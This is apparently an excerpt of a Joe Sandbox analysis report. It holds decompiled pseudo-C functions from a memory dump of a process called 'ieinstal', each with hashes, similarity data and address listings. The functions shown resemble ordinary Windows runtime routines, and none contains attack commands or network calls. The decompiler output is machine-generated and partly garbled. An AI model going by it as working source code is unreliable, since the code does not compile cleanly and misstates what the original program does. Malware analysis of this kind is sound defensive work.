                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1ba5bcfebc2ea8002b59d0a85520af9d073cf5c7dbad012a665243321b46c2d
                                                            • Instruction ID: e0a51bab943b5b485964a66de9fdec3ce1b95a73d7927a1e73877287339c0a92
                                                            • Opcode Fuzzy Hash: b1ba5bcfebc2ea8002b59d0a85520af9d073cf5c7dbad012a665243321b46c2d
                                                            • Instruction Fuzzy Hash: B841A736A002689BCB21DF65CE40FDAB7B9FF45700F0106A9E909AB244DB74ED81CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC84D3B Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E1EC84D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1ed4d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E1EC9FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1ed47bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E1EC9B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L1EC74620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E1EC5CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E1EC9B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E1EC9F380(_t67 + 0xc, 0x1ec35138, 0x10) == 0) {
								 *0x1ed460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E1EC84F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E1EC84E70(0x1ed486b0, 0x1ec85690, 0, 0) != 0) {
					_t46 = E1EC5CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                            0x1ec84d3b
                                                            0x1ec84d4d
                                                            0x1ec84d53
                                                            0x1ec84d58
                                                            0x1ec84d65
                                                            0x1ec84d6c
                                                            0x1ec84d71
                                                            0x1ec84d77
                                                            0x1ec84d7f
                                                            0x1ec84d8c
                                                            0x1ec84d8e
                                                            0x1ec84dad
                                                            0x1ec84db0
                                                            0x1ec84db7
                                                            0x1ec84db8
                                                            0x1ec84db9
                                                            0x1ec84dba
                                                            0x1ec84dbb
                                                            0x1ec84dc1
                                                            0x1ec84dc8
                                                            0x1ec84dcc
                                                            0x1ec84dd5
                                                            0x1ec84dde
                                                            0x1ec84ddf
                                                            0x1ec84de0
                                                            0x1ec84de1
                                                            0x1ec84de6
                                                            0x1ec84de7
                                                            0x1ec84de9
                                                            0x1ec84df3
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6c7c
                                                            0x1ecc6c8a
                                                            0x1ecc6c8a
                                                            0x1ecc6c9d
                                                            0x1ecc6ca7
                                                            0x1ecc6cac
                                                            0x1ecc6cb2
                                                            0x1ecc6cb9
                                                            0x00000000
                                                            0x1ecc6cbf
                                                            0x1ecc6cbf
                                                            0x00000000
                                                            0x1ecc6cbf
                                                            0x1ecc6cb9
                                                            0x1ec84dfb
                                                            0x1ecc6ccf
                                                            0x1ecc6cd3
                                                            0x1ec84e32
                                                            0x1ec84e39
                                                            0x1ecc6ce0
                                                            0x1ecc6cf2
                                                            0x1ecc6cf2
                                                            0x1ecc6ce0
                                                            0x1ec84e3f
                                                            0x1ec84e41
                                                            0x1ec84e51
                                                            0x1ec84e51
                                                            0x1ec84e03
                                                            0x1ec84e03
                                                            0x1ec84e09
                                                            0x1ec84e0f
                                                            0x1ec84e57
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec84e1b
                                                            0x1ec84e30
                                                            0x1ec84e5b
                                                            0x1ec84e5b
                                                            0x00000000
                                                            0x1ec84e30
                                                            0x1ec84e11
                                                            0x1ec84e11
                                                            0x1ec84e16
                                                            0x00000000
                                                            0x1ec84e16
                                                            0x1ec84e01
                                                            0x00000000
                                                            0x1ec84e01
                                                            0x1ec84da5
                                                            0x1ecc6c6b
                                                            0x00000000
                                                            0x1ec84dab
                                                            0x1ec84dab
                                                            0x00000000
                                                            0x1ec84dab

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04a7a1adf553185b6cc9b0da59c9a43748e8154b9109ef3f345664df1deb661a
                                                            • Instruction ID: 9ce2fa776b3e2948445a89c67d125a0b932953c2d0264b5e3057611f63630101
                                                            • Opcode Fuzzy Hash: 04a7a1adf553185b6cc9b0da59c9a43748e8154b9109ef3f345664df1deb661a
                                                            • Instruction Fuzzy Hash: 8B41B176A40358AFEB21CF15CD80F9AF7AAFB44614F0047AAE9459B384DB70ED44CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC68A0A Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E1EC68A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x1ed4d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E1EC9B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E1EC6E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1ec31180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E1EC81DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E1EC93C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E1EC68999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                            0x1ec68a0a
                                                            0x1ec68a1c
                                                            0x1ec68a23
                                                            0x1ec68a2e
                                                            0x1ec68a30
                                                            0x1ec68a36
                                                            0x1ec68a3c
                                                            0x1ec68a3e
                                                            0x1ec68a4a
                                                            0x1ec68a52
                                                            0x1ec68a9c
                                                            0x1ec68aae
                                                            0x1ec68a58
                                                            0x1ec68a5e
                                                            0x1ec68a6a
                                                            0x1ec68a6f
                                                            0x1ec68a75
                                                            0x1ec68a7d
                                                            0x1ec68a85
                                                            0x1ec68a86
                                                            0x1ec68a89
                                                            0x1ec68a93
                                                            0x1ec68a99
                                                            0x1ec68a9b
                                                            0x00000000
                                                            0x1ec68aaf
                                                            0x1ec68abe
                                                            0x1ec68ac3
                                                            0x1ec68acb
                                                            0x1ec68ad7
                                                            0x1ec68ae0
                                                            0x1ec68af1
                                                            0x00000000
                                                            0x1ec68af1
                                                            0x1ec68acd
                                                            0x1ec68ad5
                                                            0x1ec68afb
                                                            0x1ec68afd
                                                            0x1ec68aff
                                                            0x1ec68b07
                                                            0x1ec68b22
                                                            0x1ec68b24
                                                            0x1ec68b2a
                                                            0x1ec68b2e
                                                            0x1ec68b3f
                                                            0x1ec68b78
                                                            0x1ec68b41
                                                            0x1ec68b52
                                                            0x1ec68b54
                                                            0x1ec68b5c
                                                            0x1ec68b74
                                                            0x1ec68b74
                                                            0x1ec68b5c
                                                            0x1ec68b3f
                                                            0x1ec68b5e
                                                            0x1ec68b61
                                                            0x1ec68b64
                                                            0x1ec68b64
                                                            0x1ec68b6c
                                                            0x1ec68b6c
                                                            0x1ec68b11
                                                            0x1ecb9cd5
                                                            0x1ecb9cd5
                                                            0x1ec68b17
                                                            0x1ec68b1a
                                                            0x1ec68b1a
                                                            0x00000000
                                                            0x1ec68ad5
                                                            0x1ec68a89

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d2e965d92b3b1bf0a461cb3a1ac65f0fcdefe482f88a81003529a397157afdb
                                                            • Instruction ID: e7dccd80bbd75d225387396ca2a70b19f1ad866ad4facc2fc9413dba73018365
                                                            • Opcode Fuzzy Hash: 9d2e965d92b3b1bf0a461cb3a1ac65f0fcdefe482f88a81003529a397157afdb
                                                            • Instruction Fuzzy Hash: 114154F6A402699BDB24CF16CCD8AABB3F5EB88300F1146E9D81997346D7709E80CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD69A6 Relevance: .1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E1ECD69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1ed4d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L1EC66C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E1ECD6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E1EC99980() >= 0) {
							E1EC72280(_t56, 0x1ed48778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1ed48774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1ed48774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E1EC5B6F0(0x1ec3c338, 0x1ec3c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E1EC99520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E1EC995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E1EC6FFB0(_t68, _t77, 0x1ed48778);
				}
				_pop(_t78);
				return E1EC9B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                            0x1ecd69b5
                                                            0x1ecd69be
                                                            0x1ecd69c3
                                                            0x1ecd69c9
                                                            0x1ecd69cc
                                                            0x1ecd69d1
                                                            0x1ecd69d3
                                                            0x1ecd69de
                                                            0x1ecd69e1
                                                            0x1ecd69ea
                                                            0x1ecd69f6
                                                            0x1ecd69fe
                                                            0x1ecd6a13
                                                            0x1ecd6a14
                                                            0x1ecd6a15
                                                            0x1ecd6a16
                                                            0x1ecd6a1e
                                                            0x1ecd6a26
                                                            0x1ecd6a31
                                                            0x1ecd6a36
                                                            0x1ecd6a37
                                                            0x1ecd6a40
                                                            0x1ecd6a49
                                                            0x1ecd6a4a
                                                            0x1ecd6a53
                                                            0x1ecd6a59
                                                            0x1ecd6a5d
                                                            0x1ecd6a5e
                                                            0x1ecd6a64
                                                            0x1ecd6a67
                                                            0x1ecd6a6a
                                                            0x1ecd6a6d
                                                            0x1ecd6a70
                                                            0x1ecd6a77
                                                            0x1ecd6a7d
                                                            0x1ecd6a86
                                                            0x1ecd6a89
                                                            0x1ecd6a9c
                                                            0x1ecd6a9f
                                                            0x1ecd6aa2
                                                            0x1ecd6aa5
                                                            0x1ecd6aaf
                                                            0x1ecd6ab1
                                                            0x1ecd6ab8
                                                            0x1ecd6ab9
                                                            0x1ecd6abb
                                                            0x1ecd6abe
                                                            0x1ecd6ac5
                                                            0x1ecd6ac5
                                                            0x1ecd6aaf
                                                            0x1ecd6a40
                                                            0x1ecd6a26
                                                            0x1ecd69fe
                                                            0x1ecd6ace
                                                            0x1ecd6ad0
                                                            0x1ecd6ad3
                                                            0x1ecd6ad8
                                                            0x1ecd6adf
                                                            0x1ecd6adf
                                                            0x1ecd6ae8
                                                            0x1ecd6aef
                                                            0x1ecd6aef
                                                            0x1ecd6af9
                                                            0x1ecd6b06

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c55a14e74e041e7e2278f54b042ea445c3873f6301a3a688338d29c02b04a166
                                                            • Instruction ID: 7d9c06b0d0a549bf281aebbb0a6f9955f7de33da9f5a78dd8d5ef5a65363e4f9
                                                            • Opcode Fuzzy Hash: c55a14e74e041e7e2278f54b042ea445c3873f6301a3a688338d29c02b04a166
                                                            • Instruction Fuzzy Hash: 41417DB5D00248AFDB14CFA5CD40BEEBBF5FF48714F14862AE958A3240DB71A905CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC55210 Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E1EC55210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E1EC552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1EC995D0();
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E1EC6EB70(_t54, 0x1ed479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E1EC995D0();
								L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E1EC6EB70(_t54, 0x1ed479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E1EC9F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E1EC6EB70(_t54, 0x1ed479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1EC995D0();
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                            0x1ec55220
                                                            0x1ec55224
                                                            0x1ecb0d13
                                                            0x1ecb0d16
                                                            0x1ecb0d19
                                                            0x1ec5522a
                                                            0x1ec5522a
                                                            0x1ec5522d
                                                            0x1ec5522d
                                                            0x1ec55231
                                                            0x1ec55235
                                                            0x1ec55239
                                                            0x1ecb0d5c
                                                            0x1ecb0d62
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb0d6a
                                                            0x1ecb0d7b
                                                            0x1ecb0d7f
                                                            0x1ecb0d81
                                                            0x1ecb0d84
                                                            0x1ecb0d95
                                                            0x1ecb0d95
                                                            0x1ecb0d6c
                                                            0x1ecb0d71
                                                            0x1ecb0d71
                                                            0x1ecb0d9a
                                                            0x00000000
                                                            0x1ec5524a
                                                            0x1ec5524a
                                                            0x1ec55250
                                                            0x1ecb0d24
                                                            0x1ecb0d35
                                                            0x1ecb0d39
                                                            0x1ecb0d3b
                                                            0x1ecb0d3e
                                                            0x1ecb0d50
                                                            0x1ecb0d50
                                                            0x1ecb0d26
                                                            0x1ecb0d2b
                                                            0x1ecb0d2b
                                                            0x00000000
                                                            0x1ecb0d55
                                                            0x1ec55256
                                                            0x1ec5525b
                                                            0x1ec55265
                                                            0x1ecb0da7
                                                            0x1ec5526b
                                                            0x1ec5526e
                                                            0x1ec55272
                                                            0x1ecb0db1
                                                            0x1ecb0db4
                                                            0x1ecb0dc5
                                                            0x1ecb0dc5
                                                            0x1ec55272
                                                            0x1ec55278
                                                            0x1ec5527e
                                                            0x1ec5528a
                                                            0x1ec5528c
                                                            0x1ec5528d
                                                            0x00000000
                                                            0x1ec55280
                                                            0x1ec55282
                                                            0x1ec55288
                                                            0x1ec5529f
                                                            0x1ec55292
                                                            0x00000000
                                                            0x1ec55292
                                                            0x00000000
                                                            0x1ec55288
                                                            0x1ec5527e

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a1a4c88241b79bb98ca07951fa3e447980df4477c426582c9018b02b375be89
                                                            • Instruction ID: 79e401b89f83ff5b5a1e9fe2dc23ec00de0a477fdca0f890a4d346101956be19
                                                            • Opcode Fuzzy Hash: 6a1a4c88241b79bb98ca07951fa3e447980df4477c426582c9018b02b375be89
                                                            • Instruction Fuzzy Hash: 1F312632621641EFC7228B69CC91BA677A6FF607A0F114F1AE4154B6E4EB30FD40CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8A61C Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E1EC8A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1ed30220);
				E1ECAD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1ed47b9c; // 0x0
				_t55 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E1ECAD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1ed47b10 =  *0x1ed47b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x1ed4536c; // 0x2edc1f8
					if( *_t51 != 0x1ed45368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1ed45368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x1ed4536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E1EC8A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                            0x1ec8a61c
                                                            0x1ec8a61e
                                                            0x1ec8a623
                                                            0x1ec8a628
                                                            0x1ec8a62b
                                                            0x1ec8a62d
                                                            0x1ec8a648
                                                            0x1ec8a64a
                                                            0x1ec8a64f
                                                            0x1ecc9b44
                                                            0x1ec8a6ec
                                                            0x1ec8a6f1
                                                            0x1ec8a6f1
                                                            0x1ec8a655
                                                            0x1ec8a657
                                                            0x1ec8a65a
                                                            0x1ec8a65d
                                                            0x1ec8a662
                                                            0x1ec8a663
                                                            0x1ec8a667
                                                            0x1ec8a668
                                                            0x1ec8a66d
                                                            0x1ec8a706
                                                            0x1ec8a706
                                                            0x1ecc9bda
                                                            0x1ecc9be6
                                                            0x1ecc9beb
                                                            0x00000000
                                                            0x1ecc9beb
                                                            0x1ec8a679
                                                            0x1ecc9b7a
                                                            0x00000000
                                                            0x1ecc9b7a
                                                            0x1ec8a683
                                                            0x1ec8a6f4
                                                            0x1ec8a6f7
                                                            0x1ec8a6f9
                                                            0x1ec8a6fd
                                                            0x1ec8a6a0
                                                            0x1ec8a6a0
                                                            0x1ec8a6ad
                                                            0x1ec8a6af
                                                            0x1ec8a6b4
                                                            0x1ecc9ba7
                                                            0x1ecc9bac
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc9bc6
                                                            0x1ecc9bce
                                                            0x1ecc9bd1
                                                            0x1ecc9bd3
                                                            0x1ecc9bd3
                                                            0x00000000
                                                            0x1ecc9bd1
                                                            0x1ec8a6bd
                                                            0x1ec8a6c3
                                                            0x1ec8a6c6
                                                            0x1ec8a6d2
                                                            0x1ec8a701
                                                            0x1ec8a704
                                                            0x00000000
                                                            0x1ec8a704
                                                            0x1ec8a6d4
                                                            0x1ec8a6d6
                                                            0x1ec8a6d9
                                                            0x1ec8a6db
                                                            0x1ec8a6e1
                                                            0x1ec8a6e6
                                                            0x1ec8a6e8
                                                            0x1ec8a6e8
                                                            0x1ec8a6ea
                                                            0x00000000
                                                            0x1ec8a6ea
                                                            0x1ec8a688
                                                            0x1ec8a692
                                                            0x1ec8a694
                                                            0x1ec8a699
                                                            0x00000000
                                                            0x00000000
